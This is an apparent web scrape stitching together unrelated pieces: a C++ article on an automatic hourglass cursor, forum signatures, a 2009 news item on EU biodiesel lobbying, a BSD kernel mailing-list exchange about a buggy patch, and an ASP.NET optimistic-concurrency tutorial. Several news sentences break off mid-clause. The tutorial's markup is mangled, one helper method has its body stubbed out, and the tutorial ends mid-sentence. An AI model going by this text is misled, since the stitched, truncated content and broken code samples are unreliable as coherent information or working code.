to change to an hourglass automatically, as soon as your task had
run for more than some time limit, e.g. 1/10 of a second. I needed
to do this for a project of mine so I searched through my books and
the internet, but couldn't find any applicable code. The closest thing
I could find was an
article explaining how to do it in Java. It didn't seem
like it should be too tough to write a Windows/C++ version, but it
ended up taking me longer than I expected to get it working
properly so I thought I'd share the results.
The basic idea I had was to create a secondary
thread that would act as a "timer". The message loop
would keep resetting the timer so it normally wouldn't run out.
However, if a task took longer, then the timer would run out and the
secondary thread would change the cursor to an hourglass. It didn't take
long to set this up, but mysteriously, it didn't work. A little debugging
reassured me that my code was working properly, but that the SetCursor call in
the secondary thread wasn't working. I guessed that SetCursor didn't work from
secondary threads, but a search of the MSDN documentation and the internet didn't
find anything about this. Finally, I posted a question to
comp.os.ms-windows.programmer.win32 and went home. The first few responses
I got didn't really help, but the third response turned out to be the key.
The message referred me to an article by Petter Hesselberg in the Nov. 2001
Windows Developers Journal - "The Right Time and Place for the Wait Cursor".
I couldn't find the article, but the
source-code
was online and the key turned out to be using AttachThreadInput. Once I added this
to my code, things started to work.
I actually thought I was finished until I discovered that
when I pulled down a menu (or brought up a context menu) the cursor
changed to an hourglass. The problem was that while the menu was
displayed, my message loop wasn't running and so the timer wasn't getting
reset. After a certain amount of head scratching I came up with the idea
of using a GetMessage hook to reset the timer, since I figured the menu must
still be calling GetMessage (or PeekMessage). Sure enough this solved the menu
problem. (And probably some related issues like modal dialogs.)
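For reference, the hook idea might look roughly like the following sketch. ResetWaitTimer() is a hypothetical stand-in for whatever the real AutoWaitCursor code uses to push the timeout back, so this illustrates the approach rather than the article's actual source.

#include <windows.h>

static HHOOK g_hGetMessageHook = NULL;

void ResetWaitTimer();  // hypothetical: resets the wait-cursor countdown

// Called whenever GetMessage/PeekMessage retrieves a message for this thread,
// including while a menu or modal dialog runs its own message loop.
static LRESULT CALLBACK GetMsgProc(int code, WPARAM wParam, LPARAM lParam)
{
    if (code >= 0)
        ResetWaitTimer();
    return CallNextHookEx(g_hGetMessageHook, code, wParam, lParam);
}

void InstallGetMessageHook()
{
    // Hook only the current thread's message retrieval.
    g_hGetMessageHook = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc,
                                         NULL, GetCurrentThreadId());
}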
Again I thought I was finished, but I found one last glitch.
Just before a tool-tip appeared, the cursor flashed to an hourglass
and back. I guess tool-tips don't call GetMessage or PeekMessage while
they wait. I fixed this by simply making my timer longer than the tool-tip timer.
My last task was to extract the code, which I'd mixed
in with my message loop, into something more reusable. I ended up
packaging it into a C++ class. To use the class you simply have to create
an instance of it inside your message loop. Something like:
#include "awcursor.h"
...
while (GetMessage(&msg, NULL, 0, 0))
{
AutoWaitCursor awc;
TranslateMessage(&msg);
DispatchMessage(&msg);
}
The AutoWaitCursor constructor "starts" the
timer, and the destructor (called automatically at the end of the loop)
restores the cursor if necessary. The constructor also looks after creating
the thread and the hook the first time around.
If you look at the code, you may notice that the only concession I've made
to multi-threading is declaring several of the variables volatile. I don't make
any attempt to synchronize the threads or prevent them from accessing variables
at the same time. This was a deliberate choice, because I wanted to make
the code as fast as possible in order to not add overhead to the
message loop. How do I justify this? First, the variables are
plain integers, and therefore reading and writing them is atomic
anyway. Second, if in some rare case, a synchronization problem occurs,
the worst that can happen is the cursor might be wrong momentarily.
This is a small price to pay to keep the code simple and fast.
In practice I haven't seen any problems.
For simplicity, I've included the definition/initialization of
the static class members in the header file. This isn't the best
setup since it means you can't include this header in more than one
source file. Ideally, you'd put the definitions in a separate .cpp file.
However, you normally only have one message loop in your program anyway,
so this setup seems acceptable.
I hope you find the code and the explanation useful. Good luck!
while (GetMessage(&msg, NULL, 0, 0))
{
CWaitCursor wait;
TranslateMessage(&msg);
DispatchMessage(&msg);
}
myView.h:
{
private:
HCURSOR m_hCursor;
bool m_bMyCursorShape;
}
myView.cpp:
OnInitialUpdate()
{
...
SetClassLong(GetSafeHwnd(),
GCL_HCURSOR,
(LONG) NULL);
...
}
OnSetCursor(CWnd *pWnd, UINT nHitTest, UINT message)
{
if ( m_bMyCursorShape )
{
m_hCursor = LoadCursor(NULL, IDC_WAIT);
SetCursor(m_hCursor);
}
else
{
m_hCursor = LoadCursor(NULL, IDC_ARROW);
SetCursor(m_hCursor);
}
return CView::OnSetCursor(pWnd, nHitTest, message);
}
http://www.codeproject.com/Articles/1699/Auto-Wait-Cursor?msg=260041
John Simmons / outlaw programmer wrote:the code in that file merely kicks things off for a game.
The report of my death was an exaggeration - Mark Twain
Simply Elegant Designs JimmyRopes Designs Think inside the box! ProActive Secure Systems
I'm on-line therefore I am.
JimmyRopes
public class Naerling : Lazy<Person>{
public void DoWork(){ throw new NotImplementedException(); }
}
Dalek Dave wrote:I would put £50 on the Dalai Lama if I was a Tibetan man.
delete this;
http://www.codeproject.com/Lounge.aspx?msg=4390117
29 December 2009 12:00 [Source: ICIS news]
By Florian Neuhof
LONDON (ICIS news)--The European biodiesel industry is no stranger in the hallways of bureaucratic power.
In March 2009, lobbying by the European Biodiesel Board (EBB) led to the implementation of punitive import tariff on biodiesel coming into the EU from the
Then, in November, the board followed up this success with the announcement that it was to push for measures to stamp out the alleged practice of circumventing those tariffs by changing blend levels or re-routing
In the closing days of 2009, the EBB voiced further disgruntlement. Argentinean biodiesel producers, it claimed, were unfairly advantaged by taxes that incentivised the export of finished product over the shipping of soybean oil feedstock.
The board is likely to take further action on these “differentiated export taxes” (DETs) in January, by which time its official anti-circumvention complaint on US biodiesel should have been made to the EU.
Heavy lobbying is common fare in EU politics, especially when the subject at hand is even remotely related to agriculture. Yet the EBB’s vigorous defence of its members’ interests also highlights their vulnerability.
When the government started raising those taxes in 2008, sales took a nosedive. Industry body Verband der Deutschen Biokraftstoffindustrie (VDB) estimates that the amount of B100 sold in the German market in 2009 was down to 230,000 tonnes, from a peak of 1.84m tonnes in 2007.
The government has backed off a proposed further tax increase. But the fact remains that an industry reared on generous handouts is now hopelessly bloated, as vast overcapacity is undernourished by flagging demand. And without protectionist measures, European producers are struggling to compete with cheaper rivals abroad.
It remains to be seen how European producers will fare in 2010. But the new year holds some promise at least.
For a start, market sources predict that the EBB protestations will most likely bear fruit over the course of the year. Market participants believe that success in abolishing DETs could lead to a firming of prices.
In addition, imported feedstock could become cheaper. After soybean production in
Yet it remains to be seen how much of this feedstock finds its way to
An estimated 700,000 tonnes of soybean methyl Ester (SME) biodiesel will flow out of domestic use next year, much of which would otherwise have been earmarked for export into
In
In the
Despite its support of the industry in the past, not everything the EU does receives a favourable reception from producers in
The Renewable Energy Directive and the Fuel Quality Directive, agreed as part of the EU's climate change and energy package in December 2008, require the European Commission to compile a report "reviewing the impact of indirect land-use change on greenhouse gas emissions" and to seek ways to minimise it.
The deadline for the report is 30 June. There is much speculation in the market that palm oil, the feedstock of palm methyl ester (PME), will not be classified as renewable under the new guidelines.
Resulting uncertainty has acted as a deterrent for potential buyers. “A few weeks ago it would have been profitable to sell FAME,” says one producer, referring to the fatty acid methyl ester biodiesel, of which palm oil is a major component.
“But there were no buyers, as no one is willing to take on product which might not be usable under new regulation,” added the producer.
Like it or not, legislation is set to dominate the industry for some time yet.
For more on biodiesel visit ICIS chemical intelligence
http://www.icis.com/Articles/2009/12/29/9321855/OUTLOOK-10-Bloated-biodiesel-industry-on-EU-life-support.html
On Fri, Sep 03, 2010 at 07:29:26AM +0900, YONETANI Tomokazu wrote:
> On Thu, Sep 02, 2010 at 06:27:57PM +0000, Pratyush Kshirsagar wrote:
> > diff --git a/sys/vm/vm_map.c b/sys/vm/vm_map.c
> > index a326037..4eb9026 100644
> > --- a/sys/vm/vm_map.c
> > +++ b/sys/vm/vm_map.c
> > @@ -3657,3 +3657,20 @@ DB_SHOW_COMMAND(procvm, procvm)
> > }
> >
> > #endif /* DDB */
> > +
> > +long vmap_resident_count(vm_map_t v)
> > +{
> > + vm_map_entry_t entry;
> > + vm_map_object_t *mobj;
> > + vm_object_t obj;
> > + long pres = 0;
> > + entry = &(v->header);
> > + while(entry->next != NULL){
> > + mobj = &entry->object;
> > + if(mobj->vm_object != NULL) {
> > + obj = mobj->vm_object;
> > + pres = pres + (long) (obj->agg_pv_list_count / obj->resident_page_count);
> > + }
> > + }
> > + return pres;
> > +}
>
> The variable `entry' is not advanced in the loop, so it doesn't terminate
> until a new element is appended to the current one.

I mean, it doesn't terminate unless there's no next entry, or until the next
entry is removed all of a sudden.
http://leaf.dragonflybsd.org/mailarchive/kernel/2010-09/msg00011.html
For a web application that allows multiple users to edit data, there is the risk that two users may be editing the same data at the same time. In this tutorial we'll implement optimistic concurrency control to handle this risk.
Introduction
Without any concurrency policy in place, when two users are simultaneously editing a single record, the user who commits her changes last will override the changes made by the first.
For example, imagine that two users, Jisun and Sam, were both visiting a page in our application that allowed visitors to update and delete the products through a GridView control. Both click the Edit button in the GridView around the same time. Jisun changes the product name to "Chai Tea" and clicks the Update button. The net result is an
UPDATE statement that is sent to the database, which sets all of the product's updateable fields (even though Jisun only updated one field,
ProductName). At this point in time, the database has the values "Chai Tea," the category Beverages, the supplier Exotic Liquids, and so on for this particular product. However, the GridView on Sam's screen still shows the product name in the editable GridView row as "Chai". A few seconds after Jisun's changes have been committed, Sam updates the category to Condiments and clicks Update. This results in an
UPDATE statement sent to the database that sets the product name to "Chai," the
CategoryID to the corresponding Beverages category ID, and so on. Jisun's changes to the product name have been overwritten.
There are three concurrency control strategies available:
- Do Nothing - if concurrent users are modifying the same record, let the last commit win (the default behavior)
- Optimistic Concurrency - assume that while there may be concurrency conflicts every now and then, the vast majority of the time such conflicts won't arise; therefore, if a conflict does arise, simply inform the user that their changes can't be saved because another user has modified the same data
- Pessimistic Concurrency - assume that concurrency conflicts are commonplace and that users won't tolerate being told their changes weren't saved due to another user's concurrent activity; therefore, when one user starts updating a record, lock it, thereby preventing any other users from editing or deleting that record until the user commits their modifications
All of our tutorials thus far have used the default concurrency resolution strategy - namely, we've let the last write win. In this tutorial we'll examine how to implement optimistic concurrency control.
Note: We won't look at pessimistic concurrency examples in this tutorial series. Pessimistic concurrency is rarely used because such locks, if not properly relinquished, can prevent other users from updating data. For example, if a user locks a record for editing and then leaves for the day before unlocking it, no other user will be able to update that record until the original user returns and completes his update. Therefore, in situations where pessimistic concurrency is used, there's typically a timeout that, if reached, cancels the lock. Ticket sales websites, which lock a particular seating location for a short period while the user completes the order process, are an example of pessimistic concurrency control.
Step 1: Looking at How Optimistic Concurrency is Implemented
Optimistic concurrency control works by ensuring that the record being updated or deleted has the same values as it did when the updating or deleting process started. For example, when clicking the Edit button in an editable GridView, the record's values are read from the database and displayed in TextBoxes and other Web controls. These original values are saved by the GridView. Later, after the user makes her changes and clicks the Update button, the original values plus the new values are sent to the Business Logic Layer, and then down to the Data Access Layer. The Data Access Layer must issue a SQL statement that will only update the record if the original values that the user started editing are identical to the values still in the database. Figure 2 depicts this sequence of events.
Figure 2: For the Update or Delete to Succeed, the Original Values Must Be Equal to the Current Database Values (Click to view full-size image)
There are various approaches to implementing optimistic concurrency (see Peter A. Bromberg's Optmistic Concurrency Updating Logic for a brief look at a number of options). The ADO.NET Typed DataSet provides one implementation that can be configured with just the tick of a checkbox. Enabling optimistic concurrency for a TableAdapter in the Typed DataSet augments the TableAdapter's
UPDATE and
DELETE statements to include a comparison of all of the original values in the
WHERE clause. The following
UPDATE statement, for example, updates the name and price of a product only if the current database values are equal to the values that were originally retrieved when updating the record in the GridView. The
@ProductName and
@UnitPrice parameters contain the new values entered by the user, whereas
@original_ProductName and
@original_UnitPrice contain the values that were originally loaded into the GridView when the Edit button was clicked:
UPDATE Products SET
    ProductName = @ProductName,
    UnitPrice = @UnitPrice
WHERE ProductID = @original_ProductID
  AND ProductName = @original_ProductName
  AND UnitPrice = @original_UnitPrice
Note: This
UPDATE statement has been simplified for readability. In practice, the
UnitPrice check in the
WHERE clause would be more involved since
UnitPrice can contain
NULLs and checking if
NULL = NULL always returns False (instead you must use
IS NULL).
In addition to using a different underlying
UPDATE statement, configuring a TableAdapter to use optimistic concurrency also modifies the signature of its DB direct methods. Recall from our first tutorial, Creating a Data Access Layer, that DB direct methods were those that accepts a list of scalar values as input parameters (rather than a strongly-typed DataRow or DataTable instance). When using optimistic concurrency, the DB direct
Update() and
Delete() methods include input parameters for the original values as well. Moreover, the code in the BLL for using the batch update pattern (the
Update() method overloads that accept DataRows and DataTables rather than scalar values) must be changed as well.
Rather than extend our existing DAL's TableAdapters to use optimistic concurrency (which would necessitate changing the BLL to accommodate), let's instead create a new Typed DataSet named
NorthwindOptimisticConcurrency, to which we'll add a
Products TableAdapter that uses optimistic concurrency. Following that, we'll create a
ProductsOptimisticConcurrencyBLL Business Logic Layer class that has the appropriate modifications to support the optimistic concurrency DAL. Once this groundwork has been laid, we'll be ready to create the ASP.NET page.
Step 2: Creating a Data Access Layer That Supports Optimistic Concurrency
To create a new Typed DataSet, right-click on the
DAL folder within the
App_Code folder and add a new DataSet named
NorthwindOptimisticConcurrency. As we saw in the first tutorial, doing so will add a new TableAdapter to the Typed DataSet, automatically launching the TableAdapter Configuration Wizard. In the first screen, we're prompted to specify the database to connect to - connect to the same Northwind database using the
NORTHWNDConnectionString setting from
Web.config.
Figure 3: Connect to the Same Northwind Database (Click to view full-size image)
Next, we are prompted as to how to query the data: through an ad-hoc SQL statement, a new stored procedure, or an existing stored procedure. Since we used ad-hoc SQL queries in our original DAL, use this option here as well.
Figure 4: Specify the Data to Retrieve Using an Ad-Hoc SQL Statement (Click to view full-size image)
On the following screen, enter the SQL query to use to retrieve the product information. Let's use the exact same SQL query used for the
Products TableAdapter from our original DAL, which returns all of the
Product columns along with the product's supplier and category names:
Figure 5: Use the Same SQL Query from the Products TableAdapter in the Original DAL (Click to view full-size image)
Before moving onto the next screen, click the Advanced Options button. To have this TableAdapter employ optimistic concurrency control, simply check the "Use optimistic concurrency" checkbox.
Figure 6: Enable Optimistic Concurrency Control by Checking the "Use optimistic concurrency" CheckBox (Click to view full-size image)
Lastly, indicate that the TableAdapter should use the data access patterns that both fill a DataTable and return a DataTable; also indicate that the DB direct methods should be created. Change the method name for the Return a DataTable pattern from GetData to GetProducts, so as to mirror the naming conventions we used in our original DAL.
Figure 7: Have the TableAdapter Utilize All Data Access Patterns (Click to view full-size image)
After completing the wizard, the DataSet Designer will include a strongly-typed
Products DataTable and TableAdapter. Take a moment to rename the DataTable from
Products to
ProductsOptimisticConcurrency, which you can do by right-clicking on the DataTable's title bar and choosing Rename from the context menu.
Figure 8: A DataTable and TableAdapter Have Been Added to the Typed DataSet (Click to view full-size image)
To see the differences between the
UPDATE and
DELETE queries between the
ProductsOptimisticConcurrency TableAdapter (which uses optimistic concurrency) and the Products TableAdapter (which doesn't), click on the TableAdapter and go to the Properties window. In the
DeleteCommand and
UpdateCommand properties'
CommandText subproperties you can see the actual SQL syntax that is sent to the database when the DAL's update or delete-related methods are invoked. For the
ProductsOptimisticConcurrency TableAdapter the
DELETE statement used is:
DELETE FROM [Products]
WHERE (([ProductID] = @Original_ProductID)
  AND ([ProductName] = @Original_ProductName)
  AND ((@IsNull_SupplierID = 1 AND [SupplierID] IS NULL) OR ([SupplierID] = @Original_SupplierID))
  AND ((@IsNull_CategoryID = 1 AND [CategoryID] IS NULL) OR ([CategoryID] = @Original_CategoryID))
  AND ((@IsNull_QuantityPerUnit = 1 AND [QuantityPerUnit] IS NULL) OR ([QuantityPerUnit] = @Original_QuantityPerUnit))
  AND ((@IsNull_UnitPrice = 1 AND [UnitPrice] IS NULL) OR ([UnitPrice] = @Original_UnitPrice))
  AND ((@IsNull_UnitsInStock = 1 AND [UnitsInStock] IS NULL) OR ([UnitsInStock] = @Original_UnitsInStock))
  AND ((@IsNull_UnitsOnOrder = 1 AND [UnitsOnOrder] IS NULL) OR ([UnitsOnOrder] = @Original_UnitsOnOrder))
  AND ((@IsNull_ReorderLevel = 1 AND [ReorderLevel] IS NULL) OR ([ReorderLevel] = @Original_ReorderLevel))
  AND ([Discontinued] = @Original_Discontinued))
Whereas the
DELETE statement for the Product TableAdapter in our original DAL is the much simpler:
DELETE FROM [Products] WHERE (([ProductID] = @Original_ProductID))
As you can see, the
WHERE clause in the
DELETE statement for the TableAdapter that uses optimistic concurrency includes a comparison between each of the
Product table's existing column values and the original values at the time the GridView (or DetailsView or FormView) was last populated. Since all fields other than
ProductID,
ProductName, and
Discontinued can have
NULL values, additional parameters and checks are included to correctly compare
NULL values in the
WHERE clause.
We won't be adding any additional DataTables to the optimistic concurrency-enabled DataSet for this tutorial, as our ASP.NET page will only provide updating and deleting product information. However, we do still need to add the
GetProductByProductID(productID) method to the
ProductsOptimisticConcurrency TableAdapter.
To accomplish this, right-click on the TableAdapter's title bar (the area right above the
Fill and
GetProducts method names) and choose Add Query from the context menu. This will launch the TableAdapter Query Configuration Wizard. As with our TableAdapter's initial configuration, opt to create the
GetProductByProductID(productID) method using an ad-hoc SQL statement (see Figure 4). Since the
GetProductByProductID(productID) method returns information about a particular product, indicate that this query is a
SELECT query type that returns rows.
Figure 9: Mark the Query Type as a "
SELECT which returns rows" (Click to view full-size image)
On the next screen we're prompted for the SQL query to use, with the TableAdapter's default query pre-loaded. Augment the existing query to include the clause
WHERE ProductID = @ProductID, as shown in Figure 10.
Figure 10: Add a
WHERE Clause to the Pre-Loaded Query to Return a Specific Product Record (Click to view full-size image)
Finally, change the generated method names to
FillByProductID and
GetProductByProductID.
Figure 11: Rename the Methods to
FillByProductID and
GetProductByProductID (Click to view full-size image)
With this wizard complete, the TableAdapter now contains two methods for retrieving data:
GetProducts(), which returns all products; and
GetProductByProductID(productID), which returns the specified product.
Step 3: Creating a Business Logic Layer for the Optimistic Concurrency-Enabled DAL
Our existing
ProductsBLL class has examples of using both the batch update and DB direct patterns. The
AddProduct method and
UpdateProduct overloads both use the batch update pattern, passing in a
ProductRow instance to the TableAdapter's Update method. The
DeleteProduct method, on the other hand, uses the DB direct pattern, calling the TableAdapter's
Delete(productID) method.
With the new
ProductsOptimisticConcurrency TableAdapter, the DB direct methods now require that the original values also be passed in. For example, the
Delete method now expects ten input parameters: the original
ProductID,
ProductName,
SupplierID,
CategoryID,
QuantityPerUnit,
UnitPrice,
UnitsInStock,
UnitsOnOrder,
ReorderLevel, and
Discontinued. It uses these additional input parameters' values in
WHERE clause of the
DELETE statement sent to the database, only deleting the specified record if the database's current values map up to the original ones.
While the method signature for the TableAdapter's
Update method used in the batch update pattern hasn't changed, the code needed to record the original and new values has. Therefore, rather than attempt to use the optimistic concurrency-enabled DAL with our existing
ProductsBLL class, let's create a new Business Logic Layer class for working with our new DAL.
Add a class named
ProductsOptimisticConcurrencyBLL to the
BLL folder within the
App_Code folder.
Figure 12: Add the
ProductsOptimisticConcurrencyBLL Class to the BLL Folder
Next, add the following code to the
ProductsOptimisticConcurrencyBLL class:
using System;
using System.Data;
using System.Configuration;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;
using NorthwindOptimisticConcurrencyTableAdapters;

[System.ComponentModel.DataObject]
public class ProductsOptimisticConcurrencyBLL
{
    private ProductsOptimisticConcurrencyTableAdapter _productsAdapter = null;

    protected ProductsOptimisticConcurrencyTableAdapter Adapter
    {
        get
        {
            if (_productsAdapter == null)
                _productsAdapter = new ProductsOptimisticConcurrencyTableAdapter();
            return _productsAdapter;
        }
    }

    [System.ComponentModel.DataObjectMethodAttribute
        (System.ComponentModel.DataObjectMethodType.Select, true)]
    public NorthwindOptimisticConcurrency.ProductsOptimisticConcurrencyDataTable GetProducts()
    {
        return Adapter.GetProducts();
    }
}
Note the using
NorthwindOptimisticConcurrencyTableAdapters statement above the start of the class declaration. The
NorthwindOptimisticConcurrencyTableAdapters namespace contains the
ProductsOptimisticConcurrencyTableAdapter class, which provides the DAL's methods. Also before the class declaration you'll find the
System.ComponentModel.DataObject attribute, which instructs Visual Studio to include this class in the ObjectDataSource wizard's drop-down list.
The
ProductsOptimisticConcurrencyBLL's
Adapter property provides quick access to an instance of the
ProductsOptimisticConcurrencyTableAdapter class, and follows the pattern used in our original BLL classes (
ProductsBLL,
CategoriesBLL, and so on). Finally, the
GetProducts() method simply calls down into the DAL's
GetProducts() method and returns a
ProductsOptimisticConcurrencyDataTable object populated with a
ProductsOptimisticConcurrencyRow instance for each product record in the database.
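If you want to sanity-check the new class outside of an ObjectDataSource, a quick hypothetical code-behind snippet like the following exercises it; the ProductName property comes from the strongly-typed row, while the Debug output target and the method name are just illustrative.

// Hypothetical smoke test for the new BLL class; not part of the tutorial's pages.
private void ListAllProducts()
{
    ProductsOptimisticConcurrencyBLL productsBLL = new ProductsOptimisticConcurrencyBLL();

    NorthwindOptimisticConcurrency.ProductsOptimisticConcurrencyDataTable allProducts =
        productsBLL.GetProducts();

    foreach (NorthwindOptimisticConcurrency.ProductsOptimisticConcurrencyRow product
             in allProducts)
    {
        // Each strongly-typed row exposes the columns returned by the GetProducts() query.
        System.Diagnostics.Debug.WriteLine(product.ProductName);
    }
}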
Deleting a Product Using the DB Direct Pattern with Optimistic Concurrency
When using the DB direct pattern against a DAL that uses optimistic concurrency, the methods must be passed the new and original values. For deleting, there are no new values, so only the original values need be passed in. In our BLL, then, we must accept all of the original parameters as input parameters. Let's have the
DeleteProduct method in the
ProductsOptimisticConcurrencyBLL class use the DB direct method. This means that this method needs to take in all ten product data fields as input parameters, and pass these to the DAL, as shown in the following code:
[System.ComponentModel.DataObjectMethodAttribute
    (System.ComponentModel.DataObjectMethodType.Delete, true)]
public bool DeleteProduct(int original_productID, string original_productName,
    int? original_supplierID, int? original_categoryID, string original_quantityPerUnit,
    decimal? original_unitPrice, short? original_unitsInStock, short? original_unitsOnOrder,
    short? original_reorderLevel, bool original_discontinued)
{
    int rowsAffected = Adapter.Delete(original_productID,
        original_productName,
        original_supplierID,
        original_categoryID,
        original_quantityPerUnit,
        original_unitPrice,
        original_unitsInStock,
        original_unitsOnOrder,
        original_reorderLevel,
        original_discontinued);

    // Return true if precisely one row was deleted, otherwise false
    return rowsAffected == 1;
}
If the original values - those values that were last loaded into the GridView (or DetailsView or FormView) - differ from the values in the database when the user clicks the Delete button the
WHERE clause won't match up with any database record and no records will be affected. Hence, the TableAdapter's
Delete method will return
0 and the BLL's
DeleteProduct method will return
false.
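To make the failure path concrete, a caller might react to that boolean as in the hedged sketch below; the original_* parameters and the error-message handling are hypothetical stand-ins for however the page actually holds the grid's original values and reports problems.

// Hypothetical helper (not from the tutorial): delete via the BLL and report a
// concurrency violation when zero rows matched.
private bool TryDeleteProduct(int original_productID, string original_productName,
    int? original_supplierID, int? original_categoryID, string original_quantityPerUnit,
    decimal? original_unitPrice, short? original_unitsInStock, short? original_unitsOnOrder,
    short? original_reorderLevel, bool original_discontinued, out string errorMessage)
{
    ProductsOptimisticConcurrencyBLL productsBLL = new ProductsOptimisticConcurrencyBLL();

    bool deleted = productsBLL.DeleteProduct(original_productID, original_productName,
        original_supplierID, original_categoryID, original_quantityPerUnit,
        original_unitPrice, original_unitsInStock, original_unitsOnOrder,
        original_reorderLevel, original_discontinued);

    // A false return means the WHERE clause matched no record: another user changed
    // or removed the row after it was displayed, so surface that instead of silently
    // discarding the action.
    errorMessage = deleted
        ? null
        : "The product was not deleted because another user has modified or " +
          "deleted it. Please review the current values.";
    return deleted;
}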
Updating a Product Using the Batch Update Pattern with Optimistic Concurrency
As noted earlier, the TableAdapter's
Update method for the batch update pattern has the same method signature regardless of whether or not optimistic concurrency is employed. Namely, the
Update method expects a DataRow, an array of DataRows, a DataTable, or a Typed DataSet. There are no additional input parameters for specifying the original values. This is possible because the DataTable keeps track of the original and modified values for its DataRow(s). When the DAL issues its
UPDATE statement, the
@original_ColumnName parameters are populated with the DataRow's original values, whereas the
@ColumnName parameters are populated with the DataRow's modified values.
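The version tracking that makes this possible is plain ADO.NET behavior. The following self-contained sketch (not from the tutorial) shows a DataRow handing back both its original and its current value once AcceptChanges() has been called.

// Minimal ADO.NET sketch illustrating DataRow version tracking.
using System;
using System.Data;

class DataRowVersionDemo
{
    static void Main()
    {
        DataTable table = new DataTable("Products");
        table.Columns.Add("ProductName", typeof(string));

        DataRow row = table.NewRow();
        row["ProductName"] = "Chai";
        table.Rows.Add(row);
        row.AcceptChanges();                 // current values become the "original" ones

        row["ProductName"] = "Chai Tea";     // modify after AcceptChanges

        Console.WriteLine(row["ProductName", DataRowVersion.Original]); // Chai
        Console.WriteLine(row["ProductName", DataRowVersion.Current]);  // Chai Tea
    }
}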
In the
ProductsBLL class (which uses our original, non-optimistic concurrency DAL), when using the batch update pattern to update product information our code performs the following sequence of events:
- Read the current database product information into a ProductRow instance using the TableAdapter's GetProductByProductID(productID) method
- Assign the new values to the ProductRow instance from Step 1
- Call the TableAdapter's Update method, passing in the ProductRow instance
This sequence of steps, however, won't correctly support optimistic concurrency because the
ProductRow populated in Step 1 is populated directly from the database, meaning that the original values used by the DataRow are those that currently exist in the database, and not those that were bound to the GridView at the start of the editing process. Instead, when using an optimistic concurrency-enabled DAL, we need to alter the
UpdateProduct method overloads to use the following steps:
- Read the current database product information into a ProductsOptimisticConcurrencyRow instance using the TableAdapter's GetProductByProductID(productID) method
- Assign the original values to the ProductsOptimisticConcurrencyRow instance from Step 1
- Call the ProductsOptimisticConcurrencyRow instance's AcceptChanges() method, which instructs the DataRow that its current values are the "original" ones
- Assign the new values to the ProductsOptimisticConcurrencyRow instance
- Call the TableAdapter's Update method, passing in the ProductsOptimisticConcurrencyRow instance
Step 1 reads in all of the current database values for the specified product record. This step is superfluous in the
UpdateProduct overload that updates all of the product columns (as these values are overwritten in Step 2), but is essential for those overloads where only a subset of the column values are passed in as input parameters. Once the original values have been assigned to the
ProductsOptimisticConcurrencyRow instance, the
AcceptChanges() method is called, which marks the current DataRow values as the original values to be used in the
@original_ColumnName parameters in the
UPDATE statement. Next, the new parameter values are assigned to the
ProductsOptimisticConcurrencyRow and, finally, the
Update method is invoked, passing in the DataRow.
The following code shows the
UpdateProduct overload that accepts all product data fields as input parameters. While not shown here, the
ProductsOptimisticConcurrencyBLL class included in the download for this tutorial also contains an
UpdateProduct overload that accepts just the product's name and price as input parameters.
protected void AssignAllProductValues(
    NorthwindOptimisticConcurrency.ProductsOptimisticConcurrencyRow product,
    string productName, int? supplierID, int? categoryID, string quantityPerUnit,
    decimal? unitPrice, short? unitsInStock, short? unitsOnOrder,
    short? reorderLevel, bool discontinued)
{
    ; // assignment statements omitted in this excerpt
}

[System.ComponentModel.DataObjectMethodAttribute
    (System.ComponentModel.DataObjectMethodType.Update, true)]
public bool UpdateProduct(
    // new parameter values
    string productName, int? supplierID, int? categoryID, string quantityPerUnit,
    decimal? unitPrice, short? unitsInStock, short? unitsOnOrder,
    short? reorderLevel, bool discontinued, int productID,
    // original parameter values
    string original_productName, int? original_supplierID, int? original_categoryID,
    string original_quantityPerUnit, decimal? original_unitPrice,
    short? original_unitsInStock, short? original_unitsOnOrder,
    short? original_reorderLevel, bool original_discontinued, int original_productID)
{
    // STEP 1: Read in the current database product information
    NorthwindOptimisticConcurrency.ProductsOptimisticConcurrencyDataTable products =
        Adapter.GetProductByProductID(original_productID);
    if (products.Count == 0)
        // no matching record found, return false
        return false;
    NorthwindOptimisticConcurrency.ProductsOptimisticConcurrencyRow product = products[0];

    // STEP 2: Assign the original values to the product instance
    AssignAllProductValues(product, original_productName, original_supplierID,
        original_categoryID, original_quantityPerUnit, original_unitPrice,
        original_unitsInStock, original_unitsOnOrder, original_reorderLevel,
        original_discontinued);

    // STEP 3: Accept the changes
    product.AcceptChanges();

    // STEP 4: Assign the new values to the product instance
    AssignAllProductValues(product, productName, supplierID, categoryID, quantityPerUnit,
        unitPrice, unitsInStock, unitsOnOrder, reorderLevel, discontinued);

    // STEP 5: Update the product record
    int rowsAffected = Adapter.Update(product);

    // Return true if precisely one row was updated, otherwise false
    return rowsAffected == 1;
}
Step 4: Passing the Original and New Values From the ASP.NET Page to the BLL Methods
With the DAL and BLL complete, all that remains is to create an ASP.NET page that can utilize the optimistic concurrency logic built in to the system. Specifically, the data Web control (the GridView, DetailsView, or FormView) must remember its original values and the ObjectDataSource must pass both sets of values to the Business Logic Layer. Furthermore, the ASP.NET page must be configured to gracefully handle concurrency violations.
Start by opening the
OptimisticConcurrency.aspx page in the
EditInsertDelete folder and adding a GridView to the Designer, setting its
ID property to
ProductsGrid. From the GridView's smart tag, opt to create a new ObjectDataSource named
ProductsOptimisticConcurrencyDataSource. Since we want this ObjectDataSource to use the DAL that supports optimistic concurrency, configure it to use the
ProductsOptimisticConcurrencyBLL object.
Figure 13: Have the ObjectDataSource Use the
ProductsOptimisticConcurrencyBLL Object (Click to view full-size image)
Choose the
GetProducts,
UpdateProduct, and
DeleteProduct methods from drop-down lists in the wizard. For the UpdateProduct method, use the overload that accepts all of the product's data fields.
Configuring the ObjectDataSource Control's Properties
After completing the wizard, the ObjectDataSource's declarative markup should look like the following:
<asp:ObjectDataSource <DeleteParameters> <asp:Parameter </DeleteParameters> <Update" /> <asp:Parameter </UpdateParameters> </asp:ObjectDataSource>
As you can see, the
DeleteParameters collection contains a
Parameter instance for each of the ten input parameters in the
ProductsOptimisticConcurrencyBLL class's
DeleteProduct method. Likewise, the
UpdateParameters collection contains a
Parameter instance for each of the input parameters in
UpdateProduct.
In previous tutorials that involved data modification, we removed the ObjectDataSource's
OldValuesParameterFormatString property at this point. This property indicates that the BLL method expects the old (or original) values to be passed in as well as the new values, and its value specifies the input parameter names used for those original values. Since we are passing the original values into the BLL in this tutorial, do not remove this property.
Note: The value of the
OldValuesParameterFormatString property must map to the input parameter names in the BLL that expect the original values. Since we named these parameters
original_productName,
original_supplierID, and so on, you can leave the
OldValuesParameterFormatString property value as
